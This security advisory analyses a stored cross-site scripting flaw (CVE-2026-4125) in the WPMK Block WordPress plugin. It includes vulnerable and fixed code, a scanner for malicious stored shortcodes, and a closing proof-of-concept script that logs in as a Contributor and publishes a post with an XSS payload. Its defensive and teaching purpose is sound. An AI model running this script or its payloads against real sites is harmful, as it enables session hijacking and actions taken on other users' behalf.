Atomic Edge analysis of CVE-2026-4125 (metadata-based): This vulnerability allows authenticated attackers with Contributor-level access or higher to inject stored cross-site scripting (XSS) via the 'class' shortcode attribute in the WPMK Block plugin versions up to and including 1.0.1. The CVSS score is 6.4 (Medium), with a vector of AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N.
The root cause, inferred from the CWE-79 classification and vulnerability description, is insufficient input sanitization and output escaping in the wpmk_block_shortcode() function. The 'class' attribute is extracted from user-supplied shortcode attributes and directly concatenated into an HTML div element's class attribute without using esc_attr() or similar escaping functions. This is a classic stored XSS pattern where attacker-controlled input flows into HTML attribute context without sanitization. No code diff is available, so this is inferred from the description and common WordPress code patterns.
Exploitation: An attacker with Contributor-level access creates or edits a WordPress post/page containing the WPMK Block shortcode. The attacker injects a malicious payload into the 'class' attribute, such as xss" onclick="alert(1). The shortcode syntax would be [wpmk_block class='xss" onclick="alert(1)']. When the post is rendered, the injected JavaScript executes in the context of any user viewing the page. The attack vector is via the WordPress post editor, specifically through the shortcode interface, requiring no additional endpoints beyond standard post creation.
Remediation: The plugin should use WordPress escaping functions on the 'class' attribute before concatenation. The fix would apply esc_attr() to the attribute value to neutralize any HTML special characters or quotes. Additionally, the plugin should validate or sanitize the input attribute using sanitize_html_class() if the attribute is intended to be a single CSS class. This follows standard WordPress coding practices for shortcode attribute handling.
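The root cause and the remediation above, shown side by side as an added example. This is reconstructed illustration code, not the plugin's source (the analysis notes that no code diff is available): the function names wpmk_block_shortcode_vulnerable() and wpmk_block_shortcode_fixed(), the 'wpmk-block' base class and the shortcode defaults are assumptions. The hardened handler goes slightly beyond the single-class case in the text by accepting a space-separated list and running sanitize_html_class() on each token. So that the file also runs on the PHP CLI outside WordPress, simplified stand-ins for shortcode_atts(), esc_attr(), sanitize_html_class() and do_shortcode() are defined behind function_exists() guards; inside WordPress the real functions are used.

```php
<?php
// Added example (not the plugin's code): a reconstructed vulnerable handler
// beside a hardened one. Function names, defaults and the 'wpmk-block' base
// class are assumptions; the page provides no code diff.

if (!function_exists('shortcode_atts')) {
    // Stand-in (simplified): keep only known attribute keys, filling in defaults.
    function shortcode_atts(array $defaults, $atts) {
        $atts = is_array($atts) ? $atts : array();
        $out = array();
        foreach ($defaults as $name => $default) {
            $out[$name] = array_key_exists($name, $atts) ? $atts[$name] : $default;
        }
        return $out;
    }
}
if (!function_exists('esc_attr')) {
    // Stand-in (simplified): encode quotes, angle brackets and ampersands
    // for HTML attribute context. The real esc_attr() also checks UTF-8 and
    // avoids double-encoding existing entities.
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}
if (!function_exists('sanitize_html_class')) {
    // Stand-in mirroring core: strip percent-encoded bytes, then everything
    // outside [A-Za-z0-9_-]; fall back to $fallback if nothing survives.
    function sanitize_html_class($class, $fallback = '') {
        $class = preg_replace('/%[a-fA-F0-9][a-fA-F0-9]/', '', (string) $class);
        $class = preg_replace('/[^A-Za-z0-9_-]/', '', $class);
        return ($class === '' && $fallback !== '') ? $fallback : $class;
    }
}
if (!function_exists('do_shortcode')) {
    // Stand-in: return the inner content unchanged (no nested shortcodes).
    function do_shortcode($content) {
        return (string) $content;
    }
}

// Reconstruction of the pattern the analysis describes: the user-supplied
// value is concatenated straight into class="" with no escaping.
function wpmk_block_shortcode_vulnerable($atts, $content = '') {
    $atts = shortcode_atts(array('class' => ''), $atts);
    return '<div class="wpmk-block ' . $atts['class'] . '">' . do_shortcode($content) . '</div>';
}

// Hardened version. sanitize_html_class() reduces every token to a valid
// CSS class name (quotes, spaces, '<', '>' and '=' cannot survive), and
// esc_attr() still escapes the attribute context as defence in depth.
function wpmk_block_shortcode_fixed($atts, $content = '') {
    $atts = shortcode_atts(array('class' => ''), $atts);
    // Accept a space-separated list of classes; drop tokens that sanitize to ''.
    $tokens  = preg_split('/\s+/', trim((string) $atts['class']));
    $classes = array_filter(array_map('sanitize_html_class', $tokens), 'strlen');
    array_unshift($classes, 'wpmk-block');
    return '<div class="' . esc_attr(implode(' ', $classes)) . '">' . do_shortcode($content) . '</div>';
}

// Constructed input with the payload shape from the analysis: a value that
// closes the class attribute and appends an event-handler attribute.
$constructed_atts = array('class' => 'xss" onclick="alert(1)');
echo "vulnerable: " . wpmk_block_shortcode_vulnerable($constructed_atts, 'hi') . "\n";
echo "fixed:      " . wpmk_block_shortcode_fixed($constructed_atts, 'hi') . "\n";
```

Run with `php example.php`: the vulnerable handler emits `<div class="wpmk-block xss" onclick="alert(1)">`, while the fixed handler emits `<div class="wpmk-block xss onclickalert1">`, a harmless class list. Both layers are kept on purpose: the allowlist in sanitize_html_class() is what actually removes the injection, and esc_attr() guarantees the attribute context stays intact even if the allowlist is later relaxed. If the same value were ever written into a JavaScript or URL context, the matching esc_js() or esc_url() would be needed instead; esc_attr() is specific to HTML attributes.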
Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of users viewing the compromised page. This can lead to session hijacking, phishing attacks, defacement, or unauthorized actions performed on behalf of authenticated users. Because the script executes in the context of the affected site, it can access cookies, local storage, and perform actions as the logged-in user. The changed scope (S:C) in the CVSS vector indicates the payload affects resources beyond the vulnerable component, such as other users' sessions.
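Because the payload is stored in post content by a low-privilege author (the exploitation and impact paragraphs above), a site owner can sweep existing posts for WPMK Block shortcodes whose class attribute carries characters a CSS class never needs. The following is an added, defender-side example and not part of the Atomic Edge analysis: find_suspicious_wpmk_blocks(), wpmk_extract_class_attr() and the sample rows are constructed here; on a live site the rows would be read from wp_posts (ID, post_author, post_content).

```php
<?php
// Added example (not part of the analysis): flag stored [wpmk_block]
// shortcodes whose class attribute falls outside the character set that
// sanitize_html_class() permits. Function names and sample rows are constructed.

// Characters sanitize_html_class() keeps, plus whitespace so that a
// space-separated class list such as "hero wide" is not flagged.
const WPMK_SAFE_CLASS_RE = '/^[A-Za-z0-9_\s-]*$/';

// Return the raw value of the class attribute inside one shortcode tag
// (double-quoted, single-quoted or unquoted), or null if there is none.
function wpmk_extract_class_attr($tag) {
    if (!preg_match('/\bclass\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s\]]+))/i', $tag, $m)) {
        return null;
    }
    foreach (array(1, 2, 3) as $i) {
        if (isset($m[$i]) && $m[$i] !== '') {
            return $m[$i];
        }
    }
    return '';
}

// Scan rows shaped like array('ID' => int, 'post_author' => int,
// 'post_content' => string) and return one finding per suspicious tag.
function find_suspicious_wpmk_blocks(array $rows) {
    $findings = array();
    foreach ($rows as $row) {
        // Opening tags only: "[/wpmk_block]" does not match "\[wpmk_block".
        if (!preg_match_all('/\[wpmk_block\b[^\]]*\]/i', $row['post_content'], $tags)) {
            continue;
        }
        foreach ($tags[0] as $tag) {
            $class = wpmk_extract_class_attr($tag);
            if ($class === null || preg_match(WPMK_SAFE_CLASS_RE, $class)) {
                continue; // no class attribute, or a plain class token list
            }
            $findings[] = array(
                'post_id'   => $row['ID'],
                'author'    => $row['post_author'],
                'class'     => $class,
                'shortcode' => $tag,
            );
        }
    }
    return $findings;
}

// Constructed sample rows: two benign uses and one carrying the payload
// shape from the analysis (the class value closes the attribute).
$sample_rows = array(
    array('ID' => 10, 'post_author' => 2, 'post_content' => '[wpmk_block class="hero wide"]Welcome[/wpmk_block]'),
    array('ID' => 11, 'post_author' => 3, 'post_content' => '[wpmk_block class=btn-primary]Buy[/wpmk_block]'),
    array('ID' => 12, 'post_author' => 5, 'post_content' => "[wpmk_block class='xss\" onclick=\"alert(1)']x[/wpmk_block]"),
);

foreach (find_suspicious_wpmk_blocks($sample_rows) as $f) {
    printf("[!] post %d (author %d): class=%s\n", $f['post_id'], $f['author'], json_encode($f['class']));
}
```

On the sample rows only post 12 is reported, with the class value `xss" onclick="alert(1)`. The check is deliberately conservative: any quote, bracket, equals sign or percent-encoded byte in the class value is reported, so a handful of false positives (for example a percent-encoded class name) are expected and cheap to review. Note that a shortcode like the one in the PoC below, which passes `onclick` as a separate shortcode attribute rather than inside the class value, does not land in the class attribute and is not what this sweep looks for; it looks for values that would break out of the attribute the analysis describes.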
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4125 - WPMK Block <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes
$target_url = 'http://example.com'; // Change to target WordPress site URL
$username = 'contributor'; // WordPress user with Contributor role
$password = 'password'; // Password for the user
// Step 1: Login to WordPress
$login_url = $target_url . '/wp-login.php';
$login_data = array(
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
// Step 2: Create a new post with the malicious shortcode
$post_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_URL, $post_url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
// Extract _wpnonce from the response (simplified; full implementation would parse HTML)
preg_match('/name="_wpnonce" value="([^"]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';
// Step 3: Submit the post with injected XSS payload in the shortcode
$create_post_url = $target_url . '/wp-admin/post.php';
$post_data = array(
'_wpnonce' => $nonce,
'post_title' => 'CVE-2026-4125 Test',
'content' => '[wpmk_block class="xss" onclick="alert(1);"]Your content here[/wpmk_block]',
'post_status' => 'publish',
'post_type' => 'post',
'action' => 'editpost',
'originalaction' => 'editpost'
);
curl_setopt($ch, CURLOPT_URL, $create_post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
// Check if post was created (simplified)
if (strpos($response, 'Post published.') !== false) {
echo "[+] PoC post created successfully. Visit the post to trigger XSS.\n";
} else {
echo "[-] Failed to create post. Check credentials or nonce handling.\n";
}
curl_close($ch);